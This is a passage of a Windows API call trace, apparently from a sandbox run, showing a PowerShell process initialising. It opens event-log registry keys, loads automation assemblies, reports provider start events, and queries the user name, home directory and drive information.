	[0203.288] RegEnumKeyExW (in: hKey=0x380, dwIndex=0x8, lpName=0x46ba40, lpcchName=0x29d2c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x29d2c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0203.288] CoTaskMemFree (pv=0x46ba40) 
	[0203.288] CoTaskMemFree (pv=0x0) 
	[0203.288] RegOpenKeyExW (in: hKey=0x380, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x29d328 | out: phkResult=0x29d328*=0x364) returned 0x0
	[0203.288] RegOpenKeyExW (in: hKey=0x364, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x29d328 | out: phkResult=0x29d328*=0x0) returned 0x2
	[0203.288] RegOpenKeyExW (in: hKey=0x380, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x29d328 | out: phkResult=0x29d328*=0x384) returned 0x0
	[0203.288] RegOpenKeyExW (in: hKey=0x384, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x29d328 | out: phkResult=0x29d328*=0x0) returned 0x2
	[0203.288] RegOpenKeyExW (in: hKey=0x380, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x29d328 | out: phkResult=0x29d328*=0x388) returned 0x0
	[0203.288] RegOpenKeyExW (in: hKey=0x388, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x29d328 | out: phkResult=0x29d328*=0x0) returned 0x2
	[0203.288] RegOpenKeyExW (in: hKey=0x380, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x29d328 | out: phkResult=0x29d328*=0x38c) returned 0x0
	[0203.288] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x29d328 | out: phkResult=0x29d328*=0x0) returned 0x2
	[0203.288] RegOpenKeyExW (in: hKey=0x380, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x29d328 | out: phkResult=0x29d328*=0x390) returned 0x0
	[0203.289] RegOpenKeyExW (in: hKey=0x390, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x29d328 | out: phkResult=0x29d328*=0x0) returned 0x2
	[0203.289] RegOpenKeyExW (in: hKey=0x380, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x29d328 | out: phkResult=0x29d328*=0x394) returned 0x0
	[0203.289] RegOpenKeyExW (in: hKey=0x394, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x29d328 | out: phkResult=0x29d328*=0x0) returned 0x2
	[0203.289] RegOpenKeyExW (in: hKey=0x380, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x29d328 | out: phkResult=0x29d328*=0x0) returned 0x5
	[0203.362] RegOpenKeyExW (in: hKey=0x380, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x29d328 | out: phkResult=0x29d328*=0x398) returned 0x0
	[0203.362] RegOpenKeyExW (in: hKey=0x398, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x29d328 | out: phkResult=0x29d328*=0x0) returned 0x2
	[0203.362] RegOpenKeyExW (in: hKey=0x380, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x29d328 | out: phkResult=0x29d328*=0x39c) returned 0x0
	[0203.362] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x29d328 | out: phkResult=0x29d328*=0x3a0) returned 0x0
	[0203.362] RegCloseKey (hKey=0x3a0) returned 0x0
	[0203.362] RegCloseKey (hKey=0x380) returned 0x0
	[0203.362] RegCloseKey (hKey=0x39c) returned 0x0
	[0203.372] RegisterEventSourceW (lpUNCServerName=".", lpSourceName="PowerShell") returned 0x1b930008
	[0203.379] ReportEventW (hEventLog=0x1b930008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x334e370*="WSMan", lpRawData=0x334e0e0) returned 1
	[0203.534] CoTaskMemAlloc (cb=0x104) returned 0x4bdf80
	[0203.534] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4bdf80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0203.534] CoTaskMemFree (pv=0x4bdf80) 
	[0203.535] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29ce60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0203.536] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29cdb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0203.536] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29cdb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0203.563] CoTaskMemAlloc (cb=0x804) returned 0x1b858470
	[0203.563] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b858470, nSize=0x29d5b8 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x29d5b8) returned 0x1
	[0203.564] CoTaskMemFree (pv=0x1b858470) 
	[0203.564] CoTaskMemAlloc (cb=0x204) returned 0x46ba40
	[0203.564] GetUserNameW (in: lpBuffer=0x46ba40, pcbBuffer=0x29d5f8 | out: lpBuffer="aETAdzjz", pcbBuffer=0x29d5f8) returned 1
	[0203.564] CoTaskMemFree (pv=0x46ba40) 
	[0203.565] ReportEventW (hEventLog=0x1b930008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2e3d6d8*="Alias", lpRawData=0x2e3d468) returned 1
	[0203.989] CoTaskMemAlloc (cb=0x104) returned 0x4bdf80
	[0203.989] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4bdf80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0203.990] CoTaskMemFree (pv=0x4bdf80) 
	[0203.991] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29ce60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0203.991] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29cdb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0203.991] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29cdb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0203.992] CoTaskMemAlloc (cb=0x804) returned 0x1b858470
	[0203.992] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b858470, nSize=0x29d5b8 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x29d5b8) returned 0x1
	[0203.992] CoTaskMemFree (pv=0x1b858470) 
	[0203.992] CoTaskMemAlloc (cb=0x204) returned 0x46ba40
	[0203.992] GetUserNameW (in: lpBuffer=0x46ba40, pcbBuffer=0x29d5f8 | out: lpBuffer="aETAdzjz", pcbBuffer=0x29d5f8) returned 1
	[0203.992] CoTaskMemFree (pv=0x46ba40) 
	[0203.992] ReportEventW (hEventLog=0x1b930008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2e43128*="Environment", lpRawData=0x2e42eb8) returned 1
	[0204.019] CoTaskMemAlloc (cb=0x104) returned 0x4bdf80
	[0204.019] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4bdf80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0204.019] CoTaskMemFree (pv=0x4bdf80) 
	[0204.020] CoTaskMemAlloc (cb=0x104) returned 0x4bdf80
	[0204.020] GetEnvironmentVariableW (in: lpName="HOMEDRIVE", lpBuffer=0x4bdf80, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0204.020] CoTaskMemFree (pv=0x4bdf80) 
	[0204.020] CoTaskMemAlloc (cb=0x104) returned 0x4bdf80
	[0204.020] GetEnvironmentVariableW (in: lpName="HOMEPATH", lpBuffer=0x4bdf80, nSize=0x80 | out: lpBuffer="\\Users\\aETAdzjz") returned 0xf
	[0204.020] CoTaskMemFree (pv=0x4bdf80) 
	[0204.020] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz", nBufferLength=0x105, lpBuffer=0x29d160, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11
	[0204.021] SetErrorMode (uMode=0x1) returned 0x1
	[0204.021] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz" (normalized: "c:\\users\\aetadzjz"), fInfoLevelId=0x0, lpFileInformation=0x29d370 | out: lpFileInformation=0x29d370*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2329edc0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7d929a80, ftLastAccessTime.dwHighDateTime=0x1d2f182, ftLastWriteTime.dwLowDateTime=0x7d929a80, ftLastWriteTime.dwHighDateTime=0x1d2f182, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0204.021] SetErrorMode (uMode=0x1) returned 0x1
	[0204.022] GetLogicalDrives () returned 0x4
	[0204.022] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x29ced0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0204.023] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0204.023] SetErrorMode (uMode=0x1) returned 0x1
	[0204.024] CoTaskMemAlloc (cb=0x68) returned 0x1b835900
	[0204.024] CoTaskMemAlloc (cb=0x68) returned 0x1b835970
	[0204.024] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1b835900, nVolumeNameSize=0x32, lpVolumeSerialNumber=0x29d340, lpMaximumComponentLength=0x29d33c, lpFileSystemFlags=0x29d338, lpFileSystemNameBuffer=0x1b835970, nFileSystemNameSize=0x32 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x29d340*=0x705ba84c, lpMaximumComponentLength=0x29d33c*=0xff, lpFileSystemFlags=0x29d338*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1
	[0204.024] CoTaskMemFree (pv=0x1b835900) 
	[0204.024] CoTaskMemFree (pv=0x1b835970) 
	[0204.024] SetErrorMode (uMode=0x1) returned 0x1
	[0204.024] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0204.025] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x29d080, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0204.025] SetErrorMode (uMode=0x1) returned 0x1
	[0204.025] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x29d2e0 | out: lpFileInformation=0x29d2e0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6cd47e0, ftLastAccessTime.dwHighDateTime=0x1d337b1, ftLastWriteTime.dwLowDateTime=0x6cd47e0, ftLastWriteTime.dwHighDateTime=0x1d337b1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0204.025] SetErrorMode (uMode=0x1) returned 0x1
	[0204.025] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x29d080, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0204.026] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x29cf30, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0204.026] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0204.026] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x29ce60, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0204.026] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0204.027] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x29ceb0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0204.027] SetErrorMode (uMode=0x1) returned 0x1
	[0204.027] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x29d110 | out: lpFileInformation=0x29d110*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6cd47e0, ftLastAccessTime.dwHighDateTime=0x1d337b1, ftLastWriteTime.dwLowDateTime=0x6cd47e0, ftLastWriteTime.dwHighDateTime=0x1d337b1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0204.027] SetErrorMode (uMode=0x1) returned 0x1
	[0204.027] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x29ceb0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0204.027] SetErrorMode (uMode=0x1) returned 0x1
	[0204.027] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x29d110 | out: lpFileInformation=0x29d110*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6cd47e0, ftLastAccessTime.dwHighDateTime=0x1d337b1, ftLastWriteTime.dwLowDateTime=0x6cd47e0, ftLastWriteTime.dwHighDateTime=0x1d337b1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0204.027] SetErrorMode (uMode=0x1) returned 0x1
	[0204.027] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x29cf50, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0204.027] SetErrorMode (uMode=0x1) returned 0x1
	[0204.028] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x29d1b0 | out: lpFileInformation=0x29d1b0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6cd47e0, ftLastAccessTime.dwHighDateTime=0x1d337b1, ftLastWriteTime.dwLowDateTime=0x6cd47e0, ftLastWriteTime.dwHighDateTime=0x1d337b1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0204.028] SetErrorMode (uMode=0x1) returned 0x1
	[0204.028] CoTaskMemAlloc (cb=0x804) returned 0x1b858470
	[0204.028] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b858470, nSize=0x29d5b8 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x29d5b8) returned 0x1
	[0204.028] CoTaskMemFree (pv=0x1b858470) 
	[0204.028] CoTaskMemAlloc (cb=0x204) returned 0x46ba40
	[0204.028] GetUserNameW (in: lpBuffer=0x46ba40, pcbBuffer=0x29d5f8 | out: lpBuffer="aETAdzjz", pcbBuffer=0x29d5f8) returned 1
	[0204.028] CoTaskMemFree (pv=0x46ba40) 
	[0204.029] ReportEventW (hEventLog=0x1b930008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2e4a180*="FileSystem", lpRawData=0x2e49f10) returned 1
	[0204.041] CoTaskMemAlloc (cb=0x104) returned 0x4bdf80
	[0204.041] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4bdf80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0204.041] CoTaskMemFree (pv=0x4bdf80) 
	[0204.042] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29ce90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0204.042] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29cde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0204.043] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29cde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0204.043] CoTaskMemAlloc (cb=0x804) returned 0x1b858470
	[0204.043] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b858470, nSize=0x29d5b8 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x29d5b8) returned 0x1
	[0204.043] CoTaskMemFree (pv=0x1b858470) 
	[0204.043] CoTaskMemAlloc (cb=0x204) returned 0x46ba40
	[0204.043] GetUserNameW (in: lpBuffer=0x46ba40, pcbBuffer=0x29d5f8 | out: lpBuffer="aETAdzjz", pcbBuffer=0x29d5f8) returned 1
	[0204.043] CoTaskMemFree (pv=0x46ba40) 
	[0204.044] ReportEventW (hEventLog=0x1b930008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2e4f970*="Function", lpRawData=0x2e4f700) returned 1
	[0204.073] CoTaskMemAlloc (cb=0x104) returned 0x4bdf80
	[0204.073] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4bdf80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0204.073] CoTaskMemFree (pv=0x4bdf80) 
	[0210.928] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29ce60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0210.928] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29cdb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0210.928] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29cdb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0211.607] CoTaskMemAlloc (cb=0x804) returned 0x1b87d4d0
	[0211.607] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b87d4d0, nSize=0x29d5b8 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x29d5b8) returned 0x1
	[0211.607] CoTaskMemFree (pv=0x1b87d4d0) 
	[0211.607] CoTaskMemAlloc (cb=0x204) returned 0x46ba40
	[0211.607] GetUserNameW (in: lpBuffer=0x46ba40, pcbBuffer=0x29d5f8 | out: lpBuffer="aETAdzjz", pcbBuffer=0x29d5f8) returned 1
	[0211.608] CoTaskMemFree (pv=0x46ba40) 
	[0211.608] ReportEventW (hEventLog=0x1b930008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2e81cf8*="Registry", lpRawData=0x2e81a88) returned 1
	[0211.618] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29ce60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0211.618] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29cdb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0211.618] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29cdb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0211.618] CoTaskMemAlloc (cb=0x804) returned 0x1b87d4d0
	[0211.618] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b87d4d0, nSize=0x29d5b8 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x29d5b8) returned 0x1
	[0211.618] CoTaskMemFree (pv=0x1b87d4d0) 
	[0211.618] CoTaskMemAlloc (cb=0x204) returned 0x46ba40
	[0211.618] GetUserNameW (in: lpBuffer=0x46ba40, pcbBuffer=0x29d5f8 | out: lpBuffer="aETAdzjz", pcbBuffer=0x29d5f8) returned 1
	[0211.619] CoTaskMemFree (pv=0x46ba40) 
	[0211.619] ReportEventW (hEventLog=0x1b930008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2e870c0*="Variable", lpRawData=0x2e86e50) returned 1
	[0211.679] CoTaskMemAlloc (cb=0x104) returned 0x4bdf80
	[0211.679] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4bdf80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0211.680] CoTaskMemFree (pv=0x4bdf80) 
	[0211.682] CoTaskMemAlloc (cb=0x104) returned 0x4bdf80
	[0211.682] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4bdf80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0211.682] CoTaskMemFree (pv=0x4bdf80) 
	[0211.684] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x29ce60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0211.684] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x29cdb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0211.684] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x29cdb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0211.685] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x29cdb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0218.496] CoTaskMemAlloc (cb=0x804) returned 0x1b87d4d0
	[0218.496] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b87d4d0, nSize=0x29d5b8 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x29d5b8) returned 0x1
	[0218.496] CoTaskMemFree (pv=0x1b87d4d0) 
	[0218.496] CoTaskMemAlloc (cb=0x204) returned 0x46ba40
	[0218.496] GetUserNameW (in: lpBuffer=0x46ba40, pcbBuffer=0x29d5f8 | out: lpBuffer="aETAdzjz", pcbBuffer=0x29d5f8) returned 1
	[0218.496] CoTaskMemFree (pv=0x46ba40) 
	[0218.497] ReportEventW (hEventLog=0x1b930008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2e9ac88*="Certificate", lpRawData=0x2e9aa18) returned 1
	[0218.875] CoTaskMemAlloc (cb=0x104) returned 0x4bdf80
	[0218.875] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4bdf80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0218.875] CoTaskMemFree (pv=0x4bdf80) 
	[0218.878] GetLogicalDrives () returned 0x4
	[0218.878] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x29d240, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0218.878] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0218.879] CoTaskMemAlloc (cb=0x20e) returned 0x1b837250
	[0218.879] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1b837250 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents") returned 0x1b
	[0218.879] CoTaskMemFree (pv=0x1b837250) 
	[0218.880] CoTaskMemAlloc (cb=0x104) returned 0x4bdf80
	[0218.880] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4bdf80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0218.880] CoTaskMemFree (pv=0x4bdf80) 
	[0218.880] CoTaskMemAlloc (cb=0x104) returned 0x4bdf80
	[0218.880] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4bdf80, nSize=0x80 | out: lpBuffer="") returned 0x0
